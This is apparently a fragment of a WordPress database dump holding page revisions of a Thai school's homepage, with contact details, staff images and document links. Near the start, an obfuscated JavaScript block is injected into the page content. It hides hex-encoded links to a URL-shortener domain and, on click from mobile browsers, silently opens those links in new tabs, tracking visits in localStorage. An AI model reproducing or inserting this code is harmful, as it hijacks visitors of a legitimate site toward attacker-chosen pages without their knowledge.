gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:44:05','2025-07-15 09:44:05','',19,'http://watprato.ssk.in.th/?p=723',0,'revision','',0),
(725,1,'2025-07-15 17:11:20','2025-07-15 10:11:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline 